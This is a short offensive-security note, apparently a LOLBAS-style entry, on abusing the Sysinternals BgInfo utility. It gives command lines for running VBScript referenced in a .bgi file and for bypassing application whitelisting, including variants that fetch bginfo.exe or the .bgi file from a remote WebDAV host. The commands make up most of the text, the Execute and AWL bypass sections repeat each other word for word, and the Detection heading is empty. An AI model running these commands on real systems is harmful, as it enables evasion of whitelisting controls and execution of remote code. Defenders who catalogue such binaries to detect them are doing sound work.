~/Privilege Escalation/Windows/Binaries# cat Bginfo.exe.md

Background Information Utility included with SysInternals Suite

Paths:

No fixed path

Detection:

Execute

Execute VBscript code that is referenced within the bginfo.bgi file.

bginfo.exe bginfo.bgi /popup /nolicprompt

Execute bginfo.exe from a WebDAV server.

\\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt

This style of execution may not longer work due to patch.

\\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt

AWL bypass

Execute VBscript code that is referenced within the bginfo.bgi file.

bginfo.exe bginfo.bgi /popup /nolicprompt

Execute bginfo.exe from a WebDAV server.

\\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt

This style of execution may not longer work due to patch.

\\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt